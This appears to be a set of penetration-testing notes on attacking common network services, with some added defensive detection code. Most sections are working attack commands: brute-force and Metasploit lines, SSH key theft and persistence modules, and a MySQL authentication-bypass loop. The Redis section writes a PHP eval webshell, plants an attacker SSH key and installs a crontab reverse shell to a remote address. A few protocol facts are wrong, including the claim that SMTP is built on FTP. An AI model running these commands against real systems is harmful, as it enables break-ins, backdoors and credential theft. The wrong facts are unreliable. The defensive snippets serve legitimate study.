
Common service vulnerabilities

FTP vulnerabilities

FTP protocol overview

FTP (File Transfer Protocol) is one of the protocols in the TCP/IP suite. It has two components, an FTP server and an FTP client: the server stores files, and users reach the resources on it through an FTP client that speaks the FTP protocol. When developing a website, FTP is commonly used to upload pages or programs to the web server, and because its transfer efficiency is high it is also the usual choice for moving large files across a network.

By default FTP uses two TCP ports, 20 and 21: port 21 carries control information and port 20 carries data. Whether port 20 is actually used for data depends on the transfer mode. In active mode the server opens the data connection from port 20; in passive mode the data port is negotiated between server and client for each transfer.
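The PASV/PORT negotiation just described is why stateful firewalls need an FTP helper and why clients validate what the other side announces. The following Python is an added example (not part of the original post) that decodes the h1,h2,h3,h4,p1,p2 tuple both commands use and applies the check a careful client or proxy makes before opening the data connection: the advertised address must be the host on the other end of the control connection, and the port must not be a privileged one (that last rule is a policy assumption of the example). The sample messages are constructed.

```python
import re

# Constructed sample messages, not captured from a real server.
SAMPLE_PASV_REPLY = "227 Entering Passive Mode (192,0,2,10,195,80)."
SAMPLE_PORT_COMMAND = "PORT 192,0,2,55,4,1"

# The same h1,h2,h3,h4,p1,p2 tuple is used by the client's PORT command (active mode)
# and by the server's 227 reply to PASV (passive mode).
_HOST_PORT = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def decode_host_port(text):
    """Return (ip, port) from an FTP host-port tuple; port = p1 * 256 + p2."""
    match = _HOST_PORT.search(text)
    if match is None:
        raise ValueError("no h1,h2,h3,h4,p1,p2 tuple in %r" % text)
    fields = [int(x) for x in match.groups()]
    if any(f > 255 for f in fields):
        raise ValueError("field out of range in %r" % text)
    ip = ".".join(str(f) for f in fields[:4])
    port = fields[4] * 256 + fields[5]
    if port == 0:
        raise ValueError("data port 0 is invalid")
    return ip, port


def _check_endpoint(ip, port, control_peer_ip):
    # The data endpoint must belong to the same host as the control connection.
    # Accepting any other address lets the peer redirect the data connection to a
    # third host (the classic FTP bounce problem), so refuse it.
    if ip != control_peer_ip:
        raise ValueError("data address %s does not match control peer %s" % (ip, control_peer_ip))
    # Policy assumption: data connections never go to privileged ports.
    if port < 1024:
        raise ValueError("refusing privileged data port %d" % port)
    return ip, port


def passive_data_endpoint(pasv_reply, server_ip):
    """Client side: where to connect after a 227 reply to PASV."""
    if not pasv_reply.startswith("227"):
        raise ValueError("expected a 227 reply, got %r" % pasv_reply)
    ip, port = decode_host_port(pasv_reply)
    return _check_endpoint(ip, port, server_ip)


def active_data_endpoint(port_command, client_ip):
    """Server side: where to connect (from port 20) after a client PORT command."""
    if not port_command.upper().startswith("PORT "):
        raise ValueError("expected a PORT command, got %r" % port_command)
    ip, port = decode_host_port(port_command)
    return _check_endpoint(ip, port, client_ip)


if __name__ == "__main__":
    print(passive_data_endpoint(SAMPLE_PASV_REPLY, "192.0.2.10"))   # ('192.0.2.10', 50000)
    print(active_data_endpoint(SAMPLE_PORT_COMMAND, "192.0.2.55"))  # ('192.0.2.55', 1025)
```

The address comparison is the part worth keeping: a server that accepts a PORT pointing at a third host can be used as a relay, and a client that follows a 227 reply to a different address than the one it authenticated to will send its data somewhere it never intended.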

Banner information

Banner information reveals which software and version a remote system is running, which is enough to look up the known vulnerabilities in it, so the version string should be hidden after any service is installed.

Anonymous login

msf

scanner/ftp/anonymous module

Man-in-the-middle sniffing

An attacker can use a sniffing tool to capture the packets exchanged between server and client on the network and pull the credentials out of them (sniffing), then use those credentials for unauthorized access. FTP authenticates users with a plaintext username and password, so the login is exposed to anyone who can see the traffic.

FTP brute-force tools

hydra

hydra -v -L user.txt -P pass.txt ftp://ip

MSF

auxiliary/scanner/ftp/ftp_login

vsftpd smiley-face backdoor

Version: vsftpd 2.3.4

Backdoor:

If the username contains :) the backdoor opens a shell bound to port 6200.

Defense

Change the banner text in the configuration

Enable TLS (ssl_enable=YES in vsftpd.conf)

Restrict logins with a whitelist

Use iptables to limit the connection rate and the number of concurrent connections

SSH vulnerabilities

SSH overview

SSH is the abbreviation of Secure Shell, a protocol specified by the IETF's Network Working Group. SSH is a security protocol that works at the application layer, designed to provide reliable remote login sessions and other network services. Used correctly, it makes up for weaknesses in the network and prevents information leakage during remote management. SSH began as a program on UNIX systems and quickly spread to other platforms. SSH clients exist for many platforms, and almost every UNIX platform, including HP-UX, Linux, AIX, Solaris, Digital UNIX, Irix and others, can run SSH.

Port scanning

nmap

nmap -sV -p 22 IP

msf

auxiliary/scanner/ssh/ssh_version

Password cracking

msf

use auxiliary/scanner/ssh/ssh_login
set stop_on_success true

SSH user code execution

msf

use exploit/multi/ssh/sshexec

Establishing an SSH connection with an RSA key

Configuration:

ssh-keygen
cd /home/kali/.ssh
ls
cat id_rsa.pub >> authorized_keys    # append the public key to the authorized list
scp msfadmin@ip:/home/msfadmin/.ssh/id_rsa ./
sudo vim /etc/ssh/sshd_config
PasswordAuthentication no    # sshd_config setting: keys only, no passwords
sudo /etc/init.d/ssh restart

Connect:

ssh -i id_rsa username@ip

Stealing SSH keys

With a meterpreter session obtained, steal the SSH keys:

use auxiliary/scanner/ssh/ssh_login    # get the session first
use post/multi/gather/ssh_creds
set session 1
run

SSH key persistence backdoor

With a meterpreter session obtained, leave an SSH key persistence backdoor:

use auxiliary/scanner/ssh/ssh_login    # get the session first
use post/linux/manage/sshkey_persistence
set session 1
run

Defense

Change the default port:

sudo vim /etc/ssh/sshd_config
Port 22222    # sshd_config setting
sudo /etc/init.d/ssh restart

Telnet vulnerabilities

Telnet overview

The Telnet protocol is a member of the TCP/IP protocol family and is the standard protocol and main method of Internet remote login. It lets a user do work on a remote host from the local computer: the user runs the telnet program on their own terminal, connects to the server and types commands into it, and those commands run on the server just as if they had been typed at the server's console, so the server is controlled as if it were local. To start a telnet session, a username and password must be entered to log in to the server. Telnet is a commonly used way to control a web server remotely.

Banner information

The banner text comes from /etc/issue.net

msf

use auxiliary/scanner/telnet/telnet_version

Change the default port

Edit the telnet entry in /etc/services, then restart xinetd:

sudo /etc/init.d/xinetd restart

Stealing credentials by sniffing

Telnet transmits everything in plaintext, so credentials can be sniffed.

Brute force

hydra

hydra -v -L user.txt -P pass.txt telnet://IP

msf

use auxiliary/scanner/telnet/telnet_login
set rhosts IP
set stop_on_success true
set user_file user.txt
set pass_file pass.txt
run

Protecting telnet from brute-force attacks

Allow traffic to port 23 from the IP address 192.168.1.1:

sudo iptables -A INPUT -s 192.168.1.1 -p tcp --dport 23 -j ACCEPT

Drop traffic to port 23 from every other IP address (this rule must come after the ACCEPT rule, since iptables uses the first matching rule):

sudo iptables -A INPUT -p tcp --dport 23 -j DROP

SMTP vulnerabilities

SMTP overview

SMTP is a protocol that provides reliable and efficient email transmission. SMTP is a mail service built on the FTP file transfer service; it is mainly used to deliver mail between systems and to provide notifications about incoming mail. SMTP is independent of any particular transport subsystem and only requires a reliable, ordered data stream. One of its important features is the ability to relay mail across networks (SMTP mail relay): with SMTP, mail can be passed between processes on the same network, or between a process and other networks through a relay or gateway.

SMTP commands and return codes

MAIL FROM: specifies the sender address

RCPT TO: specifies a single recipient; there may be several RCPT TO commands, and they usually follow MAIL FROM

VRFY: asks whether a user/mailbox exists; servers often disable this command for security reasons

EXPN: checks that a given mailing list exists and expands it; also often disabled

Return codes:

250: requested mail action completed

500: requested action not taken, mailbox unavailable (for example the mailbox was not found or is not accessible)

Postfix overview

Postfix is the default mail transfer agent (MTA) on Ubuntu

http://www.postfix.org

SMTP user enumeration

On Ubuntu, system users are also Postfix mail users. Enumeration methods:

telnet

smtp-user-enum

msf

Enumerating SMTP users manually

telnet

VRFY ftp

MAIL FROM:ftp followed by RCPT TO:ftp

smtp-user-enum

apt-get install smtp-user-enum
smtp-user-enum -M VRFY -u root -t 202.38.xxx.xxx
smtp-user-enum -M VRFY -U dic.txt -t 202.38.xxx.xxx
smtp-user-enum -M RCPT -u bin -t 202.38.xxx.xxx
smtp-user-enum -M EXPN -u bin -t 202.38.xxx.xxx

msf

auxiliary/scanner/smtp/smtp_enum
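From the mail server's side, the RCPT TO probing above leaves a trail: Postfix logs every rejected recipient with the client address. The following Python is an added example (not part of the original post) that scans Postfix smtpd log lines for "Recipient address rejected: User unknown" rejections and flags clients that probe many different recipients, which separates an enumeration run from a single mistyped address. The log lines are constructed to match Postfix's format; the threshold and the host names are assumptions.

```python
import re
from collections import defaultdict

# Constructed Postfix log excerpt (not a real capture). One client probes several
# local users that do not exist; a partner mail server mistypes one address twice.
SAMPLE_MAIL_LOG = """\
Jan 10 12:00:01 mail postfix/smtpd[2311]: connect from unknown[203.0.113.7]
Jan 10 12:00:02 mail postfix/smtpd[2311]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <alice@example.org>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<alice@example.org> proto=SMTP helo=<scanner>
Jan 10 12:00:02 mail postfix/smtpd[2311]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <bob@example.org>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<bob@example.org> proto=SMTP helo=<scanner>
Jan 10 12:00:03 mail postfix/smtpd[2311]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <carol@example.org>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<carol@example.org> proto=SMTP helo=<scanner>
Jan 10 12:00:03 mail postfix/smtpd[2311]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <dave@example.org>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<dave@example.org> proto=SMTP helo=<scanner>
Jan 10 12:00:04 mail postfix/smtpd[2311]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <dave@example.org>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<dave@example.org> proto=SMTP helo=<scanner>
Jan 10 12:00:05 mail postfix/smtpd[2311]: disconnect from unknown[203.0.113.7]
Jan 10 12:07:41 mail postfix/smtpd[2402]: NOQUEUE: reject: RCPT from mx.partner.example[198.51.100.4]: 550 5.1.1 <jhon@example.org>: Recipient address rejected: User unknown in local recipient table; from=<ann@partner.example> to=<jhon@example.org> proto=ESMTP helo=<mx.partner.example>
Jan 10 12:07:42 mail postfix/smtpd[2402]: NOQUEUE: reject: RCPT from mx.partner.example[198.51.100.4]: 550 5.1.1 <jhon@example.org>: Recipient address rejected: User unknown in local recipient table; from=<ann@partner.example> to=<jhon@example.org> proto=ESMTP helo=<mx.partner.example>
"""

# Matches Postfix's rejection line for a non-existent local recipient.
USER_UNKNOWN = re.compile(
    r"reject: RCPT from (?P<host>\S+)\[(?P<ip>[0-9a-fA-F.:]+)\]: 550 \S+ <(?P<rcpt>[^>]+)>: "
    r"Recipient address rejected: User unknown"
)


def unknown_recipient_probes(log_text):
    """Map client IP -> set of distinct non-existent recipients it asked for."""
    probes = defaultdict(set)
    for line in log_text.splitlines():
        match = USER_UNKNOWN.search(line)
        if match:
            probes[match.group("ip")].add(match.group("rcpt").lower())
    return probes


def enumerating_clients(log_text, threshold=4):
    """Clients that asked for at least `threshold` distinct unknown recipients.

    Counting distinct addresses rather than rejections keeps a retried typo at 1,
    while an enumeration run walks through a word list and grows quickly."""
    probes = unknown_recipient_probes(log_text)
    return sorted(ip for ip, rcpts in probes.items() if len(rcpts) >= threshold)


if __name__ == "__main__":
    for ip, rcpts in unknown_recipient_probes(SAMPLE_MAIL_LOG).items():
        print(ip, len(rcpts), "distinct unknown recipients")
    print("enumerating:", enumerating_clients(SAMPLE_MAIL_LOG))
```

On the Postfix side, `disable_vrfy_command = yes` in main.cf removes the VRFY method entirely, and `smtpd_soft_error_limit` and `smtpd_hard_error_limit` make Postfix slow down and then disconnect a client that keeps producing errors such as unknown recipients, which turns a fast word-list run into a slow one even before any alert fires.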

Brute force

hydra

hydra -l msfadmin -P passwd.txt smtp://IP

Samba vulnerabilities

Samba overview

Samba is free software that implements the SMB protocol on Linux and UNIX systems; it consists of server and client programs.

SMB overview

SMB (Server Message Block) is a communication protocol for sharing files and printers on a local area network: it lets the different computers on the LAN offer files, printers and other resources to each other.

SMB is a client/server protocol through which clients access shared file systems, printers and other resources on the server. With NetBIOS over TCP/IP configured, Samba can share resources not only with hosts on the local network but with computers anywhere.

SMB information disclosure

msf

auxiliary/scanner/smb/smb_version

nmap

nmap -sV -p 445 IP
nmap -sV -v -p 445 --script=smb-vuln* IP

nmblookup

nmblookup queries NetBIOS names and maps them to IP addresses using NetBIOS-over-TCP/IP name queries. Its options let a name query be directed at a specific IP broadcast area or at a specific machine. All queries are sent over UDP.

nmblookup is useful for enumerating domain/workstation names and MAC addresses:

nmblookup -A 192.168.1.139

nbtscan

Scans for NetBIOS name servers on a local or remote TCP/IP network; this is the first step in finding open shares.

It can scan a whole subnet rather than a single IP:

nbtscan 192.168.1.1/24

SMBMap

SMBMap lets users enumerate Samba shares across an entire domain: it lists shares, share permissions and share contents, supports upload and download, automatically downloads files whose names match a pattern, and can even execute remote commands. It is designed to simplify the search for potentially sensitive data on large networks.

smbmap -H 192.168.1.139
smbmap -H 192.168.1.139 -u msfadmin -p msfadmin

Brute force

hydra

hydra -L user.txt -P pass.txt -v smb://ip

Command execution

search smb 3.0.20
use exploit/multi/samba/usermap_script

Zookeeper

Zookeeper overview

Zookeeper is a distributed service framework and a sub-project of Apache Hadoop. It is mainly used to solve data management problems that distributed applications often run into, such as unified naming services, state synchronization, cluster management and management of distributed application configuration items.

Environment setup

wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gz
tar -xzvf zookeeper-3.4.14.tar.gz
mv zookeeper-3.4.14/conf/zoo_sample.cfg zookeeper-3.4.14/conf/zoo.cfg    # the sample config lives in conf/
zookeeper-3.4.14/bin/zkServer.sh start

Unauthorized access

Zookeeper has no password set by default. Without any access control, an attacker can obtain a large amount of sensitive information about the system by sending the envi command, including the host name and the Java environment.

Zookeeper listens on port 2181 by default:

netstat -an | grep 2181
nmap -sV -p 2181 IP

The four-letter commands can be sent with nc:

nc IP 2181

envi: print detailed information about the server environment

stat: list statistics about performance and connected clients

ruok: test whether the server is running in a non-error state

reqs: list outstanding requests

dump: list outstanding sessions and ephemeral nodes

Graphical interface tool: ZooInspector

MySQL vulnerabilities

MySQL overview

The MySQL database is one of the most widely used databases in the world; many well-known companies and sites rely on MySQL as their database backend.

Many stacks use MySQL as the database management system, such as LAMP and WAMP.

MySQL information gathering

Version information

nmap:

nmap -sV -p 3306 IP

msf:

use auxiliary/scanner/mysql/mysql_version

Other related information

use auxiliary/admin/mysql/mysql_enum

MySQL password cracking

hydra

hydra -L user.txt -P password.txt -v mysql://IP

msf

use auxiliary/scanner/mysql/mysql_login

MySQL exploitation

MySQL authentication bypass vulnerability (CVE-2012-2122)

https://secists.org/oss-sec/2012/q2/493

The code assumes that memcmp() returns a value within [-128, 127]: it compares the two strings byte by byte and, on the first differing byte, returns the difference of the two bytes. check_scramble() stores that return value in a my_bool, which is a char, so the comparison only works as long as memcmp() really stays within that range; an optimized memcmp() can return a larger value whose low 8 bits are zero, and the truncated result is then 0 even though the hashes differ.

When memcmp() returns 0, check_scramble() accepts the authentication.
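To make the truncation concrete, the following Python is an added example (not from the original post and not MySQL's source) that models the two memcmp() behaviours and the my_bool narrowing: a byte-by-byte memcmp() never leaves [-128, 127], so the narrowing is harmless, while a word-at-a-time memcmp() (a constructed stand-in for an optimized library routine, not glibc's code) can return a multiple of 256 that narrows to 0. The hash values are constructed, and the "fixed" function shows the shape of the repair, collapsing the result to 0/1 before it is narrowed.

```python
SHA1_HASH_SIZE = 20

# Constructed scramble hashes: the 'wrong' one differs from the expected one in a
# single byte, so a byte-wise compare returns -1 and a 4-byte-word compare returns -256.
EXPECTED_HASH = bytes(SHA1_HASH_SIZE)
WRONG_HASH = b"\x00\x00\x01\x00" + bytes(SHA1_HASH_SIZE - 4)


def my_bool(value):
    """Model assigning an int to MySQL's my_bool (a typedef for char):
    only the low 8 bits survive, interpreted as a signed byte."""
    low = value & 0xFF
    return low - 256 if low > 127 else low


def bytewise_memcmp(a, b):
    """memcmp() as the code assumed it: on the first differing byte return the
    difference of the two bytes, which is always within [-128, 127]."""
    for x, y in zip(a, b):
        if x != y:
            return x - y
    return len(a) - len(b)


def wordwise_memcmp(a, b):
    """Constructed model of an optimized memcmp() that compares 4-byte words and
    returns their difference, so a mismatch can be any non-zero int, including
    multiples of 256. This is not glibc's code; it only reproduces the property."""
    for i in range(0, min(len(a), len(b)), 4):
        wa = int.from_bytes(a[i:i + 4], "big")
        wb = int.from_bytes(b[i:i + 4], "big")
        if wa != wb:
            return wa - wb
    return len(a) - len(b)


def check_scramble_vulnerable(expected, got, memcmp):
    """Vulnerable shape: the int from memcmp() is returned through my_bool, so a
    non-zero result whose low byte is 0 looks like 'equal' (0)."""
    return my_bool(memcmp(expected, got))


def check_scramble_fixed(expected, got, memcmp):
    """Fixed shape: collapse the result to 0/1 before it is narrowed."""
    return my_bool(1 if memcmp(expected, got) != 0 else 0)


def password_accepted(check_result):
    """The caller treats a 0 return from check_scramble() as a correct password."""
    return check_result == 0


def truncated_zero_rate(lo=-32768, hi=32768):
    """Fraction of int results in [lo, hi) that my_bool() narrows to 0: 1/256,
    which is why a few hundred wrong-password attempts are enough to hit the bug
    when the scramble is random and memcmp() returns wide differences."""
    zeros = sum(1 for v in range(lo, hi) if my_bool(v) == 0)
    return zeros / (hi - lo)


if __name__ == "__main__":
    print(password_accepted(check_scramble_vulnerable(EXPECTED_HASH, WRONG_HASH, bytewise_memcmp)))  # False
    print(password_accepted(check_scramble_vulnerable(EXPECTED_HASH, WRONG_HASH, wordwise_memcmp)))  # True
    print(password_accepted(check_scramble_fixed(EXPECTED_HASH, WRONG_HASH, wordwise_memcmp)))       # False
    print(truncated_zero_rate())  # 0.00390625
```

The defender's lesson is the one the fix encodes: never let a comparison routine's raw int flow into a narrower type; normalise it to a boolean first, and keep servers on a MySQL/MariaDB build that contains that fix.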


Exploitation

msf:

use auxiliary/scanner/mysql/mysql_authbypass_hashdump

Linux shell:

for i in `seq 1 1000`; do mysql -uroot -pwrong -h IP -P3306; done

Redis

Redis overview

Redis is one of the databases commonly referred to as non-relational. It is an open-source, log-structured key-value database written in ANSI C; it supports network access and persistence and provides APIs in many languages.

Redis resembles memcached in that data is cached in memory for efficiency. Unlike memcached, however, Redis periodically writes updated data to disk or appends modification operations to a log file, and builds master-slave replication on top of that.

Redis unauthorized access vulnerability

The default configuration listens on port 6379 without a password, which allows unauthorized reading and writing of Redis data.

Writing a webshell into the web directory

config set dir /var/www/html
config set dbfilename webshell.php
set webshell '<?php phpinfo();?>'
save

Tip for writing the shell with Redis when the database is too large (write a small dropper instead of the shell itself):

<?php
set_time_limit(0);
$fp=fopen('webshell.php','w');
fwrite($fp,'<?php @eval($_POST[1]);?>');
exit();
?>

Writing an SSH public key

ssh-keygen -t rsa
cd .ssh
(echo -e '\n\n'; cat id_rsa.pub; echo -e '\n\n') > 1.txt    # pad the key so the RDB noise around it lands on separate lines
cat 1.txt | redis-cli -h ip -x set payload
config set dir /root/.ssh    # the following three lines are entered in redis-cli
config set dbfilename authorized_keys
save

Writing a crontab

redis-cli -h 192.168.0.104
set xxx '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.0.104/4444 0>&1\n\n'
config set dir /var/spool/cron
config set dbfilename root
save
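All three write primitives above (webshell, authorized_keys, crontab) leave the same fingerprint on the server: a client points dir and dbfilename at a path that is not the RDB location and then triggers a dump. The following Python is an added example (not part of the original post) that reads Redis MONITOR output, tracks those two settings and raises an alert when a CONFIG SET or a SAVE/BGSAVE would put the dump into a web root, an .ssh directory or a cron spool. The MONITOR lines are constructed; the list of sensitive paths is an assumption to adapt per host.

```python
import re

# Constructed MONITOR output (not a real capture). Format: <ts> [<db> <client>] "cmd" "arg"...
# 127.0.0.1 is an administrator moving the RDB file to a legitimate data directory;
# 203.0.113.9 follows the pattern from this section, from two separate connections.
SAMPLE_MONITOR = """\
1591251234.100001 [0 127.0.0.1:40210] "config" "set" "dir" "/var/lib/redis"
1591251234.100002 [0 127.0.0.1:40210] "config" "set" "dbfilename" "dump.rdb"
1591251234.100003 [0 127.0.0.1:40210] "save"
1591251240.200001 [0 203.0.113.9:51234] "set" "k1" "v1"
1591251240.200002 [0 203.0.113.9:51234] "config" "set" "dir" "/var/www/html"
1591251240.200003 [0 203.0.113.9:51234] "config" "set" "dbfilename" "webshell.php"
1591251240.200004 [0 203.0.113.9:51234] "save"
1591251250.300001 [0 203.0.113.9:51235] "config" "set" "dir" "/root/.ssh"
1591251250.300002 [0 203.0.113.9:51235] "config" "set" "dbfilename" "authorized_keys"
1591251250.300003 [0 203.0.113.9:51235] "bgsave"
"""

MONITOR_LINE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')
QUOTED_ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')   # Redis escapes are left as printed

# Assumed per-host policy: locations an RDB dump must never be written to.
SENSITIVE_DIR_PREFIXES = ("/var/www", "/srv/www", "/root/.ssh", "/home/", "/var/spool/cron", "/etc/cron")
SENSITIVE_FILENAMES = (".php", ".jsp", "authorized_keys", "crontab", "root")


def parse_monitor_line(line):
    """Return (timestamp, client, [args]) or None for a line that is not a command."""
    match = MONITOR_LINE.match(line.strip())
    if not match:
        return None
    return float(match.group("ts")), match.group("client"), QUOTED_ARG.findall(match.group("args"))


def detect_rdb_path_abuse(monitor_text):
    """Return [(client, reason, path)] alerts.

    CONFIG SET is server-wide, so the effective dir/dbfilename is tracked globally,
    not per connection: the path can be set in one connection and the dump triggered
    from another, or left to the automatic 'save' snapshot schedule. That is why a
    sensitive CONFIG SET is reported on its own as well as an explicit SAVE/BGSAVE."""
    state = {"dir": "", "dbfilename": ""}
    alerts = []
    for line in monitor_text.splitlines():
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        _ts, client, args = parsed
        cmd = args[0].lower() if args else ""
        if cmd == "config" and len(args) >= 4 and args[1].lower() == "set" and args[2].lower() in state:
            key, value = args[2].lower(), args[3]
            state[key] = value
            if key == "dir" and value.startswith(SENSITIVE_DIR_PREFIXES):
                alerts.append((client, "config set dir", value))
            if key == "dbfilename" and value.endswith(SENSITIVE_FILENAMES):
                alerts.append((client, "config set dbfilename", value))
        elif cmd in ("save", "bgsave"):
            path = state["dir"].rstrip("/") + "/" + state["dbfilename"]
            if state["dir"].startswith(SENSITIVE_DIR_PREFIXES) or state["dbfilename"].endswith(SENSITIVE_FILENAMES):
                alerts.append((client, cmd, path))
    return alerts


if __name__ == "__main__":
    for alert in detect_rdb_path_abuse(SAMPLE_MONITOR):
        print(alert)
```

MONITOR costs throughput, so on a busy instance the same check is better run against `CONFIG GET dir` and `CONFIG GET dbfilename` polled periodically. The configuration side removes the primitive altogether: `requirepass`, `protected-mode yes`, `bind 127.0.0.1` and `rename-command CONFIG ""` in redis.conf, plus running Redis as an unprivileged user so that /root/.ssh and /var/spool/cron are not writable even if CONFIG SET succeeds.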

RCE via Redis master-slave replication

https://geekby.xyz/2019/07/15/redis-ji-yu-zhu-cong-fu-zhi-de-rce-li-yong-fang-shi/

Zabbix vulnerabilities

Zabbix overview

Zabbix is a network monitoring and management system developed by Alexei Vladishev, based on a server/client architecture. It can monitor the status of network services, servers, network devices and more.

It stores its data in a variety of database backends such as MySQL, PostgreSQL, SQLite, Oracle and IBM DB2. The server side is written in C and the web management frontend in PHP. Zabbix can monitor in several ways: a Simple Check needs no agent on the client, and checks can also be based on protocols such as SMTP or HTTP.

After installing the Zabbix Agent on clients such as UNIX and Windows, CPU load, network usage, disk capacity and other states can be monitored. Even without an agent on the monitored object, Zabbix can monitor the target over SNMP, TCP, ICMP, IPMI, SSH and telnet.

In addition, Zabbix includes alert functions for various items, such as XMPP.

Zabbix SQL injection vulnerability

https://geekby.xyz/2019/03/01/zabbix-latest.php-sql-zhu-ru-lou-dong/

Zabbix command execution

During the installation and configuration of Zabbix, the administrator used a weak password or left the default username and password, for example Admin/zabbix; this makes the user authentication of the Zabbix server useless. An attacker can then create system.run[command,] monitoring items to execute commands, and even obtain a shell on the server to run mining and other activities.

https://www.jianshu.com/p/675b6385b7c0

Elasticsearch vulnerabilities

Elasticsearch overview

Elasticsearch is a distributed, highly scalable, near-real-time search and data analysis engine. It makes it easy to search, analyze and explore large amounts of data, and taking full advantage of its horizontal scalability makes data more valuable in production environments.

The way Elasticsearch works can be divided into the following steps. First, the user submits data to the Elasticsearch database; a tokenizer then splits the content into terms and stores the terms alongside the original content. When the user searches, the matching results are scored by weight and ranked according to that score.
